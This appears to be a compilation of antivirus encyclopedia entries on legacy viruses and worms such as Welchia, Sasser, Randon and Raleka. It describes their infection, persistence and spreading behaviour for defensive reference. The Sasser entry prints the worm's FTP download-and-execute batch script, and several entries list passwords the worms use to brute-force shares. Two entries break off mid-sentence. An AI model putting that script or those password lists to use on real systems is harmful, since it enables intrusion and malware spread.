Details
WpcBait

These are dangerous memory resident encrypted parasitic viruses. They hook INT 16h, 1Ch, 21h and write themselves to the end of COM and EXE files that are executed or closed. When an infected file is opened, the viruses disinfect it.
In some cases “WpcBait.3072″ formats disk sectors. Depending on the system time and their counters both viruses display the texts:
a l a - e h !
xxxxx x xxxxx xxxxx x x
|XxxxX|X |XxxxX xx |Xxxx |XxxxX
|X–+X|Xxxxx|X–+X |Xxxxx|X–+X
++ +++—-+++ ++ +—-+++ ++
—— A.R.Jr W P C B A T S ——-

Details
Woytek.1656

It is not a dangerous memory resident parasitic polymorphic virus. It hooks INT 21h and writes itself to the end of EXE files that are accessed. The virus does not infect files that have the “Marek Sell” string near the header. In case of errors while infecting a file the virus creates the DIRINFO file in the current directory and writes to there one of the strings:
Who is MR GUZEK ?
MR GUZEK was here
MR GUZEK is alive
MR GUZEK ForEver!
Immortal MR GUZEK

The virus also contains the text strings:
BioTech I, The Digital Form of Life
(c) by Woytek W. Lodz, 28 Nov 1996

Details
Wormsign.1710

It’s a dangerous not memory resident encrypted parasitic virus. It searches for COM-files and writes itself at their ends. Before infection the virus displays the string:
Wormsign !

It leaves the memory resident program that hooks INT 13h, 1Ch, 26h and on accessing to boot sectors it clears the byte in boot sectors that contains the number of disk heads. Some DOS versions halt PC on accessing to such disks. Some time after that program displays the message:
W o r m s i g n !

The virus contains the additional text string:
*** THE SANDWORM ***

Details
Worm.Win32.Zindos.a

This worm spreads via the Internet using machines infected by I-Worm.Mydoom.m and penetrates victim machines via the backdoor installed by Mydoom.m
It is also programmed to conduct a DoS attack on www.microsoft.com.
The worm is approximately 5760 bytes in size and packed using UPX.
Installation
When launched, the worm copies itself under a random name to the system’s temporary directory. It registers this file in the system registry, thus ensuring the worm file will be launched each time Windows is started.
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
“Tray”=worm file name
The worm randomly generates an IP address and will attempt to connect to this address via TCP port 1034 (the port opened by Mydoom.m). If a connection is established, the worm will send itself to the victim machine.
DoS attack
The worm sends multiple URLDownloadToCacheFile requests to the Microsoft corporate site.

Details
Worm.Win32.Welchia.b
This worm spreads via the Internet using the DCOM RPC vulnerability in Microsoft Windows, which is described in Microsoft Security Bulletin MS03-026.
The worm also attempts to infect computers where Microsoft IIS 5.0 is installated, via the WebDav vulnerability described in Microsoft Security Bulletin MS03-007.
The worm is written in Visual C++, and is approximately 12KB (12800 bytes) in size, compressed using UPX.
This version of Welchia attempts to find and delete the worms Mydoom.a and Mydoom.b from the computer.
Installation
On launching, the worm copies itself to the %System%\drivers directory under the name svchost.exe, and then creates a service named ‘WksPatch’. As a result, the worm will execute every time Windows is launched. The service display name is three words, randomly generated from the lists below:
First word:
System
Security
Remote
Routing
Performance
Network
License
Internet
Second word:
Logging
Manager
Procedure
Accounts
Event
Third word:
Provider
Sharing
Messaging
Client
For example, the display name of the service could be ‘Remote Accounts Client’ or ‘System Logging Provider’
The worm creates a unique identifier ‘WksPatch_Mutex’ to flag its presence in memory.
Deletion of Mydoom
The worm searches for files which could have been created by Mydoom.a and Mydoom.b and deletes them:
%System%\ctfmon.dll
%System%\Explorer.exe
%System%\shimgapi.dll
%System%\TaskMon.exe
Welchia.b also deletes the taskmon key from the system registry auto-run key and overwrites the hosts file with its own data (identical to default Windows data)
Windows Patch Installation
The worm then scans the Windows system registry for installed patches and service packs. If the patch for the DCOM RPC vulnerability has not been installed, Welchia will download the patch from download.microsoft.com. Once the patch is successfully downloaded and installed, the worm re-boots the computer to complete installation.
Propagation
The worm creates two different requests to be sent to remote machines. The first request contains a WebDAV exploit, and the second contains a DCOM_RPC exploit which is almost identical to the one used in Lovesan.
Welchia.b selects an IP address, sends an ICMP request and waits for a response. If the remote computer responds, the worm connects to this computer via port 135 (as did Lovesan) or via port 80 (if the remote computer uses IIS). The worm then sends a packet which loads Welchia from the host machine.
Other
The worm searches directories of the corresponding IIS for files with the following extensions:
shtml
shtm
stm
cgi
php
html
htm
asp
If the code page of the infected machine is installed in Japanese, it overwrites these files with the following text:
LET HISTORY TELL FUTURE !

1931.9.18
1937.7.7
1937.12.13 300,000 !

1941.12.7
1945.8.6 Little boy
1945.8.9 Fatso

1945.8.15
Let history tell future !
The worm ceases to function on 1st June 2004.

Details
Worm.Win32.Welchia.a
Welchia.a is an Internet Worm, which spreads through the Internet using the DCOM RPC vulnerability in Microsoft Windows described in Microsoft Security Bulletin MS03-026. The worm also breaches computers via the WebDav vulnerability in Microsoft IIS 5.0 described in Microsoft Security Bulletin MS03-007.
The worm is written in Visual C++ and is about 10 KB when compressed through UPX. It spreads as a pair of files named dllhost.exe and svchost.exe.
The worm contains the following text strings:
I love my wife & baby
~~~ Welcome Chian~~~
Notice: 2004 will remove myself:-)
~~ sorry zhongli~~~

Installation
During installation the worm first copies itself to the %System%\Wins\ folder under the name dllhost.exe and creates a service named WINS Client. Then the worm copies the tftpd.exe file from the %System%\dllcache folder naming it svchost.exe and creating an additional service - Network Connections Sharing.
As a result, Welchia obtains control over the machine and execute itself every time the computer is re-booted.

Deletion of Lovesan
Welchia scans the system for the MSBLAST.EXE process, ends the process and deletes the MSBLAST.EXE file from the hard drive.

Windows Patch Installation
The worm then scans the Windows system registry for installed patches and service packs. If the patch for the DCOM RPC vulnerability has not been installed, Welchia will initiate the downloading process. Once the patch is successfully downloaded and installed, the worm re-boots the computer to complete installation.

Spreading
Welchia uses two methods to scan for IP addresses. In the first instance, the worm uses values A and B from the current address and scans the Internet for addresses beginning with A.B.0.0, working through all addresses where C and D are greater than zero.
In the second instance the worm chooses a random IP address.
The worm creates two different requests for sending to remote computers. The first request exploits the WebDAV vulnerability, the second request exploits the DCOM RPC vulnerability almost like Lovesan.
The worm finds an IP address, sends an ICMP request to it and waits for a response. If the remote machine responds, then the worm connects to it via port 135 (like Lovesan) or port 80 (if the machine uses IIS) and sends a ready-made package which loads Welchia from the host machine (via tftp).
The worm then scans the infected machine for the TFTPD.EXE file. If the TFTPD.EXE file does not exists, Welchia will download it (naming it svchost.exe) into the folder %System%\Wins\.

Other
Once the current year becomes 2004, Welchia ceases to function and deletes itself from the system.

Details
Worm.Win32.VB.an
This worm spreads via file-sharing networks. The worm itself is a Windows PE EXE file approximately 770KB in size, written in MS Visual Basic. Installation Once launched, the worm causes the following window to be displayed: If the user clicks ‘Next’, the following fake error message will beall

Details
Worm.Win32.Sluter
Sluter is a worm virus that spreads over Win32 networks through shared resources.
The worm is a Windows PE EXE file about 18KB in length (when compressed by UPX, the decompressed size is about 45KB). It is written in Microsoft Visual C++.
When the infected file is run the worm registers itself in the system registry auto-run key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
superslut = { worm file name }

Next, Sluter runs its spreading routines.
The spreading routine runs up to 60 “threads” which scan port 445 at random IP addresses. When successfully connecting to a victim machine it tries to locate open resources on the remote computer and connects to them using several passwords such as:
“”,”admin”, “root”, “123″, e.t.c.

If a successful connection is made the worm copies itself to the victim machine under the following names:
c$\winnt\system32\msslut32.exe
Admin$\system32\msslut32.exe

The worm then uses the WinNT remote management API to run an infected file on the remote machine.
The worm doesn’t have any payload and does not manifest itself in any other way.

Details
Worm.Win32.Slackor

This is a multi-component network worm. The worm spreads over shared network resources. The worm has bugs and has a little chance to spread over networks.
The worm’s components are:
cnn3.exe - the main component (Win32 EXE file about 350K of size)
abc.bat - BAT file (about 1344 bytes)
main.exe - trojan component (Win32 EXE file, 53280 bytes)
psexec.exe - remote execution utility (not a virus/trojan, Win32 EXE file, 122880 bytes)
slacke-worm.exe - searches for network addresses (Win32 EXE files, 25K/28K depending on worm version)

The main worm component is “trojan dropping” utility and is detected as “TrojanDropper.Win32.Yabinder”.
On run it creates the “C:\sp” subdirectory, drops and executes following files in there:
C:\sp\abc.bat
C:\sp\main.exe
C:\sp\psexec.exe
C:\sp\slacke-worm.exe

The “main.exe” component is the backdoor trojan, and it is detected as “Backdoor.SdBot”.
The “slacke-worm.exe” component looks for network resources and tries to copy and activate worm copy in there with a help of two other components:
abc.bat - tries to connect to a remote resource by trying a set of logins and passwords
psexec.exe - is used to run remote worm copy on remote computer.

Details
Worm.Win32.Sasser.b

Sasser.b is an Internet worm that uses the MS Windows LSASS vulnerability described in Microsoft Security Bulletin MS04-011.
Microsoft released a patch for this vulnerability on april 13, 2004, while Sasser.a was first detected on April 30, 2004.
Sasser.b operates in a very similar manner to Lovesan, except that Lovesan exploited a vulnerability in the PRC DCOM service, not the LSASS service.
Sasser affects computers running Windows 2000, Windows XP, Windows Server 2003. Sasser functions on all other versions of Windows but is unable to infect them by attacking via the vulnerability.
Sasser is written in C/C++, using the Visual C complier. The wrom is about 15 KL and is packed by PECompact2.
Signs of Infection
avserve.exe in the Windows directory.
An error message about the LSASS service failing which usually also causes the system to reboot.
Differences between Sasser.a and Sasser.b
Sasser.b uses a different file name for the main component that is registered in the system registry autorun key: avserve2.exe instead of avserve.exe.
The unique identifier name is changed to Jobaka3 and Sasser.b also attempts to create a second identifier named JumpallsNlsTillt.
The number of propagation routines is increased from 128 to 1024 and the name of the log file is changed to win2.log

Details
Worm.Win32.Sasser.a

Sasser is an Internet worm that exploits the MS Windows LSASS vulnerability described in Microsoft Security Bulletin MS04-011.
Microsoft released a patch for this vulnerability on April 13, 2004, while Sasser.a was first detected on April 30, 2004.
Sasser operates in a very similar manner to Lovesan, except that Lovesan exploited a vulnerability in the PRC DCOM service, not the LSASS service.
Sasser affects computers running Windows 2000, Windows XP, Windows Server 2003. Sasser functions on all other versions of Windows but is unable to infect them by attacking via the vulnerability.
Sasser is written in C/C++, using the Visual C complier. The worm is about 15 KL and is packed by PECompact2.
Signs of Infection
the file ‘avserve.exe’ in the Windows directory.
An error message about the LSASS service failing which usually also causes the system to reboot.
Propagation
After launching, Sasser copies itself into the Windows root directory under the name avserve.exe and registers this file in the system registry autorun key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“avserve.exe” = “%WINDIR%\avserve.exe”
Sasser creates a unique identifier ‘Jobaka31′ in the RAM to locate copies of itself in case of future attempts of infection.
Sasser launches FTP server on TCP port 5554 and then launches 128 propagation routines. During this process, the worm attempts to initiate the AbortSystemShutdown process in order to forbid system reboot.
Sasser initiates an IP-address scan in order to identify victim addresses and sends a request to TCP port 445. If any machines respond, Sasser exploits the LSASS vulnerability to launch a ‘cmd.exe’ command shell on TCP port 9996. Finally Sasser, commands the infected machine to download and launch the main worm component under the name “N_up.exe”, where “N” is a random number:
echo off
echo open [attacking machine address] 5554>>cmd.ftp
echo anonymous>>cmd.ftp
echo user
echo bin>>cmd.ftp
echo get [random number]_up.exe>>cmd.ftp
echo bye>>cmd.ftp
echo on
ftp -s:cmd.ftp
[random number]_up.exe
echo off
del cmd.ftp
echo on
As a result, one machine may be attacked more than once and contain multiple copies of the worm with sample names such as:
23101_up.exe
5409_up.exe
and so forth.
Other
After infection the victim machine generates an error message about a LSASS service failing, whereupon it may attempt to reboot.
Sasser creates the file ‘win.log’ in the C drive root directory where the worm records the IP-addresses of all attacked machines.

Details
Worm.Win32.Randon
Randon is a Virus-Worm distributed via IRC-channels and LANs with shared resources.
When executed this worm installs its components into the subdirectory zxz and/or zx in the Windows system directory and registers its main file and the mIRC client in the Windows registry auto-run key (below):
HKLM\\Software\Microsoft\Windows\CurrentVersion\Run\updateWins
Randon then executes the above key and hides the process via the HideWIndows utility. Randon connects to the IRC-server and executes its scripts. In addition to DDoS attacks and IRC channel flooding, Randon scans port 445 of other IRC clients.
Distribution
Upon detection of an open port (445) the worm runs the batch files sencs.bat and incs.bat which try to locate open resources on the remote computer and connect to them using one of the following passwords:
“admin”, “administrator”, “root”, “admin”, “test”, “test123″, “temp”,
“temp123″, “pass”, “password”, “changeme”

If a connection is successful the worm opens a socket on port 445, transfers the trojan horse TrojanDownloader.WIn32.APher.gen and runs it. This trojan downloads a self-extracting archive of the worm’s ‘full’ version from “www.q8kiss.net” and installs it in the system.
Additional information
The Randon worm consists of the following components:
Deta.exe - HideWindows utility (WIn32 exe file)
fControl.a - an IRC script (port scanning and infection remote computers)
IfCOntrol.a - an IRC script (IRC-channels flooding and DDoS attacks (pinging different addresses) )
incs.bat - BATCH file (lan resources password cracker)
Libparse.exe is “PrcView” utility (Win32 EXE file)
psexec.exe is “PsExec” utility (Win32 EXE file)
rcfg.ini - IRC INI file (loading other scripts)
rconnect.conf - configuration file
reader.w - list of nicknames used by worm to establish connection with IRC-channels
Sa.exe - TrojanDOwnloader.Win32.Apher
scontrol.a - helper IRC script.
sencs.bat - BAT file (this file is transfered to the remote computer to perform TrojanDownloader execution)
systrey.exe - renamed mIRC client (Wind32 EXE file).

Details
Worm.Win32.Randex.a
“Randex” is a group of worms that spread over Win32 networks (local and global) through shared resources.
The worms are Windows PE EXE files that appear under several names (see name ist below). Randex worms are written in Microsoft Visual C++.
A Randex worm enters a computers and goes into a Windows folder where it registers itself in the system registry autorun key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

It then runs its spreading routine.
The routine entails scanning port 445 at random IP addresses, and when successfully connecting to a victim machine the worm tries to locate open resources on the remote computer and connect to them using various passwords such as:
“”,”admin”, “root”, “123″;
e.t.c.
When a successful connection is accomplished the worm copies itself to a victim machine under the following names:
Randex.a - hxedofos.exe
Randex.b - ns32.exe
Randex.c - msmsgr.exe
Randex.d - msmsgri32.exe
The Randex worm then uses the WinNT remote administration service to run itself on a remote machine.
Randex worms are very similar to other network worms such as: Worm.Win32.Slackor and Worm.Win32.Sluter.

Details
Worm.Win32.Raleka.a
Raleka is a worm-virus that spreads through the Internet by exploiting a vulnerability in the DCOM RPC service in Microsoft Windows. This vulnerability is detailed in Microsoft Security Bulletin MSO3-026.
The infected file is approx. 14KB in size when packed by UPX.
Installing
When run, the worm downloads and launches the Trojan called ‘Backdoor RtKit (which contains the files ntrootkit.exe and ntrootkit.reg). Raleka then starts its spreading procedure.
Replication
The worm sequentially scans IP addresses beginning from A,B,C,0. where ‘A’ and ‘B’ are taken from the address of the current victim computer and ‘C’ is selected at random.
The worm connects to IP addresses via a TCP connection to port 135 and sends out a specially formulated packet. This packet contains code that allows the worm to remotely run arbitrary commands on infected machines. If an attacked computer is vulnerable to the DCOM RPC exploit the code is automatically run.
If an attack is successful a program file called ‘down.com’ is created and run on the victim machine. This program loads the files ’svchost32.exe (the worm file), ’service.exe’ (a auxiliary file that loads services) and ‘ntrootkit.exe’ (Backdoor.RtKit).
Svchost32.exe is copied to a Windows sub directory under the name ’svchost.exe’. Additionally, a command file is created in the Windows directory that executes the svchost.exe program file. With the help of the program file ’service.exe’, this command file is set for automatic execution upon the next operating system restart.
Other
The Raleka worm launches an HTTP server on infected computers that it uses to load the worm files ’service.exe’ and ‘ntrootkit.exe’ (see “Replication” above). Then the worm connects to the IRC server ‘ircircsoulz.net and from which it can execute commands such as:
Connect to an IRC channel as indicated in the command
Upload processes from memory
Download files from the Internet
Launch files
Install the patch curing the DCOM vulnerability (it loads the patch version intended for the Spanish version of Windows XP)
Download new worm versions from indicated sites
Send out a list of IP addresses identified in scans as being open to the DCOM RPC vulnerability (see “Replication” above)

Details
Worm.Win32.Rahak.b
This network worms spreads via network resources with poor password protection. The worm infects computers connected to the Internet, running Windows, which have Remote Administrator installed and weak password protection. The worm itself is a Windows PE EXE file, approximately 69KB in size,all